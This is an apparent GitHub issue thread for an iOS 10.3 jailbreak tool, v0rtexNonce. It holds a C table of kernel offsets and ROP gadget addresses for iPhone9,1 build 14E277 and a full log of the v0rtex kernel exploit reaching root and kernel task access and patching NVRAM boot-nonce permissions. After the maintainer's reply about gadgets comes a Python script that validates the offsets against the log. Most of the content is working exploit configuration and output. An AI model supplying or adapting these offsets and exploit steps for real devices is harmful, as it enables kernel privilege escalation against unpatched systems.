arx8x / v0rtexNonce

set generator for iOS 10.3 with v0rtex exploit by siguza

IPhone 9,1 Success with those offset #41

Closed heywong1123 closed 6 years ago

heywong1123 commented 6 years ago
    // 10.3 - static (unslid) kernel addresses for iPhone9,1, build 14E277
    if(!strcmp(osversion, "14E277"))
    {
        OFFSET_ZONE_MAP                        = 0xfffffff007590478;
        OFFSET_KERNEL_MAP                      = 0xfffffff0075ec050;
        OFFSET_KERNEL_TASK                     = 0xfffffff0075ec048;
        OFFSET_REALHOST                        = 0xfffffff007572ba0;
        OFFSET_BZERO                           = 0xfffffff0070c1f80;
        OFFSET_BCOPY                           = 0xfffffff0070c1dc0;
        OFFSET_COPYIN                          = 0xfffffff0071c6134;
        OFFSET_COPYOUT                         = 0xfffffff0071c6414;
        OFFSET_ROOTVNODE                       = 0xfffffff0075ec0b0;
        OFFSET_CHGPROCCNT                      = 0xfffffff007049e4b;
        OFFSET_KAUTH_CRED_REF                  = 0xfffffff0073ada04;
        OFFSET_IPC_PORT_ALLOC_SPECIAL          = 0xfffffff0070df05c;
        OFFSET_IPC_KOBJECT_SET                 = 0xfffffff0070f22b4;
        OFFSET_IPC_PORT_MAKE_SEND              = 0xfffffff0070deb80;
        OFFSET_IOSURFACEROOTUSERCLIENT_VTAB    = 0xfffffff006e4a238;
        OFFSET_ROP_ADD_X0_X0_0x10              = 0xfffffff0064ff0a8;
        OFFSET_ROP_LDR_X0_X0_0x10              = 0xfffffff0074cf02c;
    }

Xcode log here:

    2017-12-27 16:29:01.025855+0800 v0rtexNonce[267:6431] uid isn't 0
    2017-12-27 16:29:01.027649+0800 v0rtexNonce[267:6431] Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T8010
    2017-12-27 16:29:01.027672+0800 v0rtexNonce[267:6431] loading offsets for iPhone9,1 - 14E277
    2017-12-27 16:29:01.027680+0800 v0rtexNonce[267:6431] test offset x0x0x10gadget: fffffff0064ff0a8
    2017-12-27 16:29:01.027734+0800 v0rtexNonce[267:6431] service: 630b
    2017-12-27 16:29:01.027792+0800 v0rtexNonce[267:6431] client: 640b, (os/kern) successful
    2017-12-27 16:29:01.027895+0800 v0rtexNonce[267:6431] newSurface: (os/kern) successful
    2017-12-27 16:29:01.027922+0800 v0rtexNonce[267:6431] realport: 6503, (os/kern) successful
    2017-12-27 16:29:01.031396+0800 v0rtexNonce[267:6431] port: 106603
    2017-12-27 16:29:01.031431+0800 v0rtexNonce[267:6431] mach_port_insert_right: (os/kern) successful
    2017-12-27 16:29:01.031449+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful
    2017-12-27 16:29:01.031466+0800 v0rtexNonce[267:6431] herp derp
    2017-12-27 16:29:01.132553+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful
    2017-12-27 16:29:01.329300+0800 v0rtexNonce[267:6431] mach_port_get_context: 0x300000a400000011, (os/kern) successful
    2017-12-27 16:29:01.329513+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful
    2017-12-27 16:29:01.329565+0800 v0rtexNonce[267:6431] mach_port_request_notification(realport): 0, (os/kern) successful
    2017-12-27 16:29:01.329604+0800 v0rtexNonce[267:6431] getValue(164): 0x1010 bytes, (os/kern) successful
    2017-12-27 16:29:01.329615+0800 v0rtexNonce[267:6431] realport addr: 0xffffffe0057593b0
    2017-12-27 16:29:01.329638+0800 v0rtexNonce[267:6431] mach_port_request_notification(fakeport): 6607, (os/kern) successful
    2017-12-27 16:29:01.329670+0800 v0rtexNonce[267:6431] getValue(164): 0x1010 bytes, (os/kern) successful
    2017-12-27 16:29:01.329679+0800 v0rtexNonce[267:6431] fakeport addr: 0xffffffe003db6370
    2017-12-27 16:29:01.329757+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful
    2017-12-27 16:29:01.329790+0800 v0rtexNonce[267:6431] itk_space: 0xffffffe000768798
    2017-12-27 16:29:01.329805+0800 v0rtexNonce[267:6431] self_task: 0xffffffe0059acff0
    2017-12-27 16:29:01.329818+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient port: 0xffffffe005758b28
    2017-12-27 16:29:01.329832+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient addr: 0xffffffe0059e4e00
    2017-12-27 16:29:01.329895+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient vtab: 0xfffffff008e4a238
    2017-12-27 16:29:01.329904+0800 v0rtexNonce[267:6431] slide: 0x0000000002000000
    2017-12-27 16:29:01.329925+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful
    2017-12-27 16:29:01.329940+0800 v0rtexNonce[267:6431] zone_map: 0xfffffff106465d60
    2017-12-27 16:29:01.331448+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful
    2017-12-27 16:29:01.331475+0800 v0rtexNonce[267:6431] mach_vm_remap: (os/kern) successful
    2017-12-27 16:29:01.331482+0800 v0rtexNonce[267:6431] shmem_addr: 0x00000001005c2000
    2017-12-27 16:29:01.331489+0800 v0rtexNonce[267:6431] vtab addr: 0xffffffe003db6418
    2017-12-27 16:29:01.331503+0800 v0rtexNonce[267:6431] fakeobj addr: 0xffffffe003db6000
    2017-12-27 16:29:01.331514+0800 v0rtexNonce[267:6431] kernel_task addr: 0xffffffe0007aefd0, success
    2017-12-27 16:29:01.331522+0800 v0rtexNonce[267:6431] kernproc addr: 0xfffffff0095e5478, success
    2017-12-27 16:29:01.331529+0800 v0rtexNonce[267:6431] kern_ucred: 0xffffffe0009c5a70, success
    2017-12-27 16:29:01.331537+0800 v0rtexNonce[267:6431] self_proc: 0xffffffe005751020, success
    2017-12-27 16:29:01.331544+0800 v0rtexNonce[267:6431] self_ucred: 0xffffffe0009c67f0, success
    2017-12-27 16:29:01.331551+0800 v0rtexNonce[267:6431] stole the kernel's cr_label
    2017-12-27 16:29:01.331572+0800 v0rtexNonce[267:6431] uid: 0
    2017-12-27 16:29:01.331579+0800 v0rtexNonce[267:6431] realhost: 6707 (host: a03)
    2017-12-27 16:29:01.331585+0800 v0rtexNonce[267:6431] zm_task addr: 0xffffffe003db60a0
    2017-12-27 16:29:01.331592+0800 v0rtexNonce[267:6431] km_task addr: 0xffffffe003db6180
    2017-12-27 16:29:01.331599+0800 v0rtexNonce[267:6431] kernel_map: 0xfffffff106465c40, success
    2017-12-27 16:29:01.331605+0800 v0rtexNonce[267:6431] ipc_space_kernel: 0xffffffe00076a208, success
    2017-12-27 16:29:01.331612+0800 v0rtexNonce[267:6431] zm_range: 0xffffffe0006bc000-0xffffffe0186bc000, success
    2017-12-27 16:29:01.331620+0800 v0rtexNonce[267:6431] zm_port addr: 0xffffffe0041a75d0
    2017-12-27 16:29:01.331656+0800 v0rtexNonce[267:6431] km_port addr: 0xffffffe0041a7918
    2017-12-27 16:29:01.331691+0800 v0rtexNonce[267:6431] copyin: success
    2017-12-27 16:29:01.331740+0800 v0rtexNonce[267:6431] mach_ports_lookup: (os/kern) successful
    2017-12-27 16:29:01.331763+0800 v0rtexNonce[267:6431] zone_map port: 6807
    2017-12-27 16:29:01.331770+0800 v0rtexNonce[267:6431] kernel_map port: 6907
    2017-12-27 16:29:01.331788+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful
    2017-12-27 16:29:01.331798+0800 v0rtexNonce[267:6431] mach_vm_remap: (os/kern) successful
    2017-12-27 16:29:01.331815+0800 v0rtexNonce[267:6431] remap_addr: 0xffffffe000002fd0
    2017-12-27 16:29:01.331833+0800 v0rtexNonce[267:6431] mach_vm_wire: (os/kern) successful
    2017-12-27 16:29:01.331840+0800 v0rtexNonce[267:6431] newport: 0xffffffe0041a5848
    2017-12-27 16:29:01.331856+0800 v0rtexNonce[267:6431] copyin: success
    2017-12-27 16:29:01.331872+0800 v0rtexNonce[267:6431] kernel_task: 6a07, (os/kern) successful
    2017-12-27 16:29:01.338075+0800 v0rtexNonce[267:6431] kernel_task: 0x6a07
    2017-12-27 16:29:01.338121+0800 v0rtexNonce[267:6431] Reading kernel header...
    2017-12-27 16:29:01.338151+0800 v0rtexNonce[267:6431] Found TEXT.cstring section at 0xfffffff00901f7d8
    2017-12-27 16:29:01.338403+0800 v0rtexNonce[267:6431] Found DATA.data section at 0xfffffff00953c000
    2017-12-27 16:29:01.338954+0800 v0rtexNonce[267:6431] Found string "little-endian?" at 0xfffffff00905bc4f
    2017-12-27 16:29:01.339044+0800 v0rtexNonce[267:6431] Found gOFVariables at 0xfffffff00956b6b0
    2017-12-27 16:29:01.339075+0800 v0rtexNonce[267:6431] Successfully patched permissions for variable "com.apple.System.boot-nonce"
    2017-12-27 16:29:01.339186+0800 v0rtexNonce[267:6431] Reading var failed
    2017-12-27 16:29:01.339242+0800 v0rtexNonce[267:6431] current generator:
    2017-12-27 16:30:06.163171+0800 v0rtexNonce[267:6431] [MC] System group container for systemgroup.com.apple.configurationprofiles path is /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles
    2017-12-27 16:30:06.164059+0800 v0rtexNonce[267:6431] [MC] Reading from private effective user settings.
    2017-12-27 16:30:07.111000+0800 v0rtexNonce[267:6431] [App] if we're in the real pre-commit handler we can't actually add any new fences due to CA restriction
    2017-12-27 16:30:21.557737+0800 v0rtexNonce[267:6914] Unable to setup extension context - error: Couldn't communicate with a helper application.
    regenerated 0xfca4b45e3a9134e3
    generator to set : 0xfca4b45e3a9134e3
    2017-12-27 16:30:51.679855+0800 v0rtexNonce[267:6431] IORegistryEntrySetCFProperties: (os/kern) successful
    2017-12-27 16:30:51.679896+0800 v0rtexNonce[267:6431] generator set
    2017-12-27 16:30:51.691203+0800 v0rtexNonce[267:6431] current generator: 0xfca4b45e3a9134e3

arx8x commented 6 years ago

Every required offset is the same except for the addx0x0x10 gadget. Any of those ROP gadgets should work. You're getting the second one, the project has the first one. But from my experience, the second works more reliably. The first one never worked on my iPhone 6s. Thank you.
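The way a maintainer would triage a report like this one is to cross-check the posted log against the static offset table rather than reading the hex by eye. The following is an added example, not code from the v0rtexNonce project: it parses the NSLog lines in the shape shown above, recomputes the KASLR slide from the runtime `IOSurfaceRootUserClient vtab` and the static `OFFSET_IOSURFACEROOTUSERCLIENT_VTAB`, checks that the gadget the app reported is one of the two in the table (arx8x's point about either gadget being acceptable), and confirms the run reached `uid: 0` and `generator set`. The label strings are the ones the app printed; the function names, the `Entry` record and `OFFSETS_14E277` (three entries copied from the table above) are this example's own, and `SAMPLE_LOG` is a constructed excerpt of the posted log.

```python
"""Cross-check a v0rtexNonce Xcode log against a static offset table.

Added example for triaging offset reports like the one in this issue; it is
not code from the v0rtexNonce project. Label strings are taken from the log
posted above; the function names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# NSLog line shape seen in the log: "<timestamp> <process>[<pid>:<tid>] <message>"
LOG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+[+-]\d{4}) "
    r"(?P<proc>[^\s\[]+)\[(?P<pid>\d+):(?P<tid>\d+)\] (?P<msg>.*)$"
)


@dataclass
class Entry:
    ts: str
    proc: str
    pid: int
    tid: int
    msg: str


def parse_log(text: str) -> List[Entry]:
    """One Entry per NSLog line; plain printf lines (no prefix) are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            entries.append(Entry(m["ts"], m["proc"], int(m["pid"]), int(m["tid"]), m["msg"]))
    return entries


def find_hex(entries: List[Entry], label: str) -> Optional[int]:
    """Value of the first '<label>: <hex>' message, with or without a 0x prefix."""
    prefix = label + ": "
    for e in entries:
        if e.msg.startswith(prefix):
            token = e.msg[len(prefix):].split(",")[0].split()[0]
            return int(token, 16)
    return None


# Static (unslid) addresses for iPhone9,1 / 14E277, copied from the table above.
OFFSETS_14E277 = {
    "OFFSET_IOSURFACEROOTUSERCLIENT_VTAB": 0xfffffff006e4a238,
    "OFFSET_ROP_ADD_X0_X0_0x10": 0xfffffff0064ff0a8,
    "OFFSET_ROP_LDR_X0_X0_0x10": 0xfffffff0074cf02c,
}


def check_log(text: str, offsets: Dict[str, int], build: str) -> Dict[str, bool]:
    """Consistency checks a maintainer would want before accepting the offsets."""
    entries = parse_log(text)
    observed_vtab = find_hex(entries, "IOSurfaceRootUserClient vtab")
    slide = find_hex(entries, "slide")
    gadget = find_hex(entries, "test offset x0x0x10gadget")
    static_vtab = offsets["OFFSET_IOSURFACEROOTUSERCLIENT_VTAB"]
    return {
        # the app loaded the offset set for the build the reporter claims
        "build_matches": any(
            e.msg.startswith("loading offsets for ") and e.msg.endswith(" - " + build)
            for e in entries
        ),
        # runtime vtab minus static vtab must equal the slide the app printed
        "slide_consistent": (
            observed_vtab is not None and slide is not None
            and observed_vtab - static_vtab == slide
        ),
        # either gadget in the table is acceptable (arx8x's point in the thread)
        "gadget_in_table": gadget in (
            offsets["OFFSET_ROP_ADD_X0_X0_0x10"], offsets["OFFSET_ROP_LDR_X0_X0_0x10"]
        ),
        # the run got to the end: uid 0 and the generator written
        "uid_is_root": any(e.msg == "uid: 0" for e in entries),
        "generator_set": any(e.msg == "generator set" for e in entries),
    }


# Constructed sample: an excerpt of the log posted in this issue.
SAMPLE_LOG = """\
2017-12-27 16:29:01.025855+0800 v0rtexNonce[267:6431] uid isn't 0
2017-12-27 16:29:01.027672+0800 v0rtexNonce[267:6431] loading offsets for iPhone9,1 - 14E277
2017-12-27 16:29:01.027680+0800 v0rtexNonce[267:6431] test offset x0x0x10gadget: fffffff0064ff0a8
2017-12-27 16:29:01.329895+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient vtab: 0xfffffff008e4a238
2017-12-27 16:29:01.329904+0800 v0rtexNonce[267:6431] slide: 0x0000000002000000
2017-12-27 16:29:01.331514+0800 v0rtexNonce[267:6431] kernel_task addr: 0xffffffe0007aefd0, success
2017-12-27 16:29:01.331572+0800 v0rtexNonce[267:6431] uid: 0
regenerated 0xfca4b45e3a9134e3
2017-12-27 16:30:51.679896+0800 v0rtexNonce[267:6431] generator set
"""


def run_example() -> Dict[str, bool]:
    return check_log(SAMPLE_LOG, OFFSETS_14E277, "14E277")


if __name__ == "__main__":
    for name, ok in run_example().items():
        print(f"{name:18s} {'OK' if ok else 'FAIL'}")
```

On the log above every check passes: the vtab printed at runtime is 0xfffffff008e4a238, the table's static vtab is 0xfffffff006e4a238, and the difference is exactly the 0x2000000 slide the app reported, which is why the rest of the table lines up. To check more of the table, add entries whose runtime value the app prints (any `<label>: 0x...` line) and compare them the same way as the vtab.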